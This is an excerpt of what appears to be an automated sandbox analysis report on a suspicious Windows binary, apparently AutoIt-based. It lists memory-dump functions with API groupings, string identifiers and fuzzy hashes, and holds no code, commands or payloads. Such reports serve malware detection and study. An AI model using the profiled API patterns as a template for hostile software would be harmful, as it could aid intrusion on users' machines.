                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$InfoWindow$CheckCountCtrlEnabledFocusLongMessagePostProcRadio
                                                                        • String ID:
                                                                        • API String ID: 2672075419-0
                                                                        • Opcode ID: 00206208f043b59e126de0eddc01da4ce03cfcd4bf5ebed845e1004edded0efd
                                                                        • Instruction ID: 12ae7b7e9e48c34591048d8ecb54a947ecb69aeab78a5ff404665269ae53e687
                                                                        • Opcode Fuzzy Hash: 00206208f043b59e126de0eddc01da4ce03cfcd4bf5ebed845e1004edded0efd
                                                                        • Instruction Fuzzy Hash: 65919B36B486568AEB609F69E4957BD23A5FB88B8CF104035DF0DC76A9CF39E445C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                        • Instruction ID: 28cb936568e8dcccbea1030ea9a16bbf37dbb804020f3f2ff716db82b252e974
                                                                        • Opcode Fuzzy Hash: f7d99cf07bea50fb16dd5d3cc311eaa5ea5dc55bf0c60a23a6c1e8e39f679243
                                                                        • Instruction Fuzzy Hash: 41318D34F0865296EB608F2EE94423973A6BB4C794F544038CE4EC7775DE3DE9468700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 0-1603158881
                                                                        • Opcode ID: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                        • Instruction ID: 8d3f1a81feebda1638660946418310cf0b57f4991590f40b22089149c634dcfd
                                                                        • Opcode Fuzzy Hash: 29975b3c2b9711d51f2a34939379774d20c8c5231b4f57784e2d79393856af5d
                                                                        • Instruction Fuzzy Hash: 5712B162F1964392FA688B29CC112F96391BF6C78CF944931DB1EC62B0EF7CE545D210
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Init$Clear
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                                                                        • API String ID: 3467423407-1765764032
                                                                        • Opcode ID: 06861a0f374b091e69641cdef65bc72c09dcd720b2ec6ad59c9fb3a399981ff7
                                                                        • Instruction ID: 324cb30fbffa3d1c3786e6bf688c12e1e65b972f286c568140354d7e0c1f2d26
                                                                        • Opcode Fuzzy Hash: 06861a0f374b091e69641cdef65bc72c09dcd720b2ec6ad59c9fb3a399981ff7
                                                                        • Instruction Fuzzy Hash: 89A17A32A08B4286EB209F69E4406AD77A1FB88B9CF540136DF4D87BA8DF3CE545C750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                        • String ID: -----$SysListView32
                                                                        • API String ID: 2361508679-3975388722
                                                                        • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                        • Instruction ID: 530ea59544c27b370fda342a060a91e9440ef90aea3021327175b78857bee0e6
                                                                        • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                        • Instruction Fuzzy Hash: 4051C532A147918AE720CF69E8446DD37A1FB88788F40413ADF4D87B69CF39D954CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                        • String ID:
                                                                        • API String ID: 1903627254-0
                                                                        • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                        • Instruction ID: 88d7435230e5affb8ef3c0b19aeba3fcb6a780bac8d03acce4a274852a8d6403
                                                                        • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                        • Instruction Fuzzy Hash: 4B023C66A08A8686EB60DF2AD4841AD7770FB89B88F515032EF4E87B74DF3CD549C710
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                        • Instruction ID: 1969c2319330b7c51bed41f744f42da1382d36d566deeaaf66e7d0a55218a94c
                                                                        • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                        • Instruction Fuzzy Hash: 54213972959B8182E710CF56F44936AB7A0F789FDAF044129DB8D03B64CF7CD1488B00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 3721556410-2107944366
                                                                        • Opcode ID: e424b8ba90b8cb576c13d3bd55b6e87e28f81c9c83d36e72b9ea610c100b602d
                                                                        • Instruction ID: 95d4505f25ac4255c4a0c7be71bb369d2fa9d50f4299aed2d8d0e1176ace75e1
                                                                        • Opcode Fuzzy Hash: e424b8ba90b8cb576c13d3bd55b6e87e28f81c9c83d36e72b9ea610c100b602d
                                                                        • Instruction Fuzzy Hash: 99618B22A14A5289EB10DF69E8815ED3B70FB48B9CF541132EE0D93AB9CE39E545C340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                        • String ID: 2$P
                                                                        • API String ID: 93392585-1110268094
                                                                        • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                        • Instruction ID: ea074987d731f3e084ea3bb19dd38f46627a205d741976d49fe41f933307f40d
                                                                        • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                        • Instruction Fuzzy Hash: 2A51C432E1A6C289F7648F69E4402BD77A5BB4875CF244135DB9D936B6CF38E48AC700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad_invalid_parameter_noinfo
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 4060274358-404129466
                                                                        • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                        • Instruction ID: fe54d6edd51b80590c5ea29bd4ad7fdb7064c37e6413d262336a1f165c02a345
                                                                        • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                        • Instruction Fuzzy Hash: 51214B21B1DBC381FA549B1EA90017A6395BF8CB8CF445035EF8D823A6EE7CE406D600
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                        • String ID:
                                                                        • API String ID: 1211466189-0
                                                                        • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                        • Instruction ID: bf96c8fa5d097badcba79ee14783ef489627e882fc5756d01e349a45a1625324
                                                                        • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                        • Instruction Fuzzy Hash: FFA1F422B58A9392EB688F2DE154B7977A0FB48B48F145035DF1AC3AA0DF3DE851C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                        • String ID:
                                                                        • API String ID: 50796853-0
                                                                        • Opcode ID: 18c6e7e98d25ee9453eb8a64695ba93ef2e4c35c66d04af6bd0c68575c4ce73f
                                                                        • Instruction ID: 460b2e152c0fbde3765ba6c1edef17eb51ee5ae28194fcdd32379dd12a9df513
                                                                        • Opcode Fuzzy Hash: 18c6e7e98d25ee9453eb8a64695ba93ef2e4c35c66d04af6bd0c68575c4ce73f
                                                                        • Instruction Fuzzy Hash: 39B14A72B18A4286EB20DF69D4913BD2760FF89B88F018531DB4E97AA6CF3CD115C744
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                        • Instruction ID: 031fb89bf2de25803996b4ac0468e02c5a396aa816344e5ad0f3d6c1e142585b
                                                                        • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                        • Instruction Fuzzy Hash: 53519021E0C58289FB659B2DD46837D2695BF8EB0CF2C4531CB0EC66F9CE3DA484C640
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                        • Instruction ID: 1e6c1ddf0cf45a0d98e698985c6d4dc0bd466809396b86c0a4ed96603ad9edd9
                                                                        • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                        • Instruction Fuzzy Hash: 8E41BA76628681C7E7248F66F454B6ABBA0F788BD9F104135EF8A87B64DF3CD4448B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                        • Instruction ID: a6a342ae4ea6c7ecfd558e8297b6bef2b22091739ed21156b9edf8cb2fb15309
                                                                        • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                        • Instruction Fuzzy Hash: 9EC1F332A1C6828AEB618F1D948867E6B99BF49B88F554135DB4F877B5CF3CE841C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                        • String ID:
                                                                        • API String ID: 2550207440-0
                                                                        • Opcode ID: e4a99def1a7d1c742f5f293e85c9ba40d66ec033807e78c42fddf02de16bff72
                                                                        • Instruction ID: 132d4b69c9a78ba977854d0881ab28c6f2ffc714cbd39023cf618672eec6164e
                                                                        • Opcode Fuzzy Hash: e4a99def1a7d1c742f5f293e85c9ba40d66ec033807e78c42fddf02de16bff72
                                                                        • Instruction Fuzzy Hash: ADA1AC26A086028AFB149B69C5983BC2769FB48B8CF154432DF2DC72E5DF7CE589C740
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                        • String ID:
                                                                        • API String ID: 3225163088-0
                                                                        • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                        • Instruction ID: 82eb3964846a6981790479a041ef624abf60d154de05a3db4a90d3cc100c2d33
                                                                        • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
                                                                        • Instruction Fuzzy Hash: 2FA19F72A1C6C187D7748F19A4006AEBB75FB8AB98F544125EB8A53B68CF3DD442CF00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Enabled
                                                                        • String ID:
                                                                        • API String ID: 3694350264-0
                                                                        • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                        • Instruction ID: 3eeda8e158f2a8c13b34a14bcfcb5b16b2b9b744fc44390031a66d0c93b5c12f
                                                                        • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                        • Instruction Fuzzy Hash: 48919E21E1968686FB749B19D4557B963A1BF8CB88F584032CB4DCB6B6CF3CE4998301
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                        • Instruction ID: c8f344be72231aab81925b1b289fea06b3231f1bd15e8aa7c479fa418a040d4f
                                                                        • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                        • Instruction Fuzzy Hash: 6E51A012A0D2D196FB618F79650067E6FA1FB4ABC8F4C8074DBC957B67CE29E452C320
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
